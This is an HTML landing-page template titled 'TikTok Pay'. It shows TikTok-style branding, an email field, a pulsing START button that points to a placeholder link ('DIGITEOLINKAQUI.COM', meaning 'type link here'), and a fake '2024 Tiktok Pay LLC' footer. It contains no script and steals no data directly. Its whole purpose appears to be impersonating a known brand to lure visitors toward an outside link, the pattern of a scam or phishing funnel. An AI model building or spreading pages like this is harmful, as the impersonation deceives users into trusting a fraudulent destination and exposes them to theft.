<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>TikTok Pay</title>
	<link rel="icon" href="images/favicon.png" type="image/png">
    <style>
        body {
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #d3d3d3;
            font-family: Arial, sans-serif;
        }
        .container {
            background-color: #fff;
            padding: 30px;
            border-radius: 10px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            text-align: center;
            max-width: 400px;
            width: 100%;
            box-sizing: border-box;
        }
        img {
            max-width: 100%;
            height: auto;
        }
        .title {
            font-size: 22px;
            font-weight: bold;
            margin: 20px 0;
        }
        .subtitle {
            font-size: 16px;
            margin-bottom: 20px;
        }
        input[type="email"] {
            width: 100%;
            padding: 10px;
            font-size: 16px;
            margin-bottom: 20px;
            border: 1px solid #ccc;
            border-radius: 5px;
            box-sizing: border-box;
        }
        .btn {
            display: inline-block;
            background-color: #F20449;
            color: #fff;
            font-weight: bold;
            font-size: 22px;
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            text-decoration: none;
            animation: pulse 1.5s infinite;
        }
        @keyframes pulse {
            0% {
                transform: scale(1);
            }
            50% {
                transform: scale(1.05);
            }
            100% {
                transform: scale(1);
            }
        }
        .footer {
            text-align: center;
            position: absolute;
            bottom: 10px;
            width: 100%;
        }
        .footer b {
            font-size: 16px;
        }
        .footer p {
            font-size: 16px;
        }
    </style>
</head>
<body>

    <div class="container">
        <img src="images/logotiktokpay.jpg" alt="TikTok Pay Logo">
        <div class="title">Welcome to TikTok Pay</div>
        <div class="subtitle">Enter your email to proceed!</div>
        <input type="email" placeholder="Your email">
        <a href="https://DIGITEOLINKAQUI.COM" class="btn">START</a>
    </div>

    <div class="footer">
        <b>2024 Tiktok Pay LLC</b>
        <p>Terms and Privacy Policy</p>
    </div>

</body>
</html>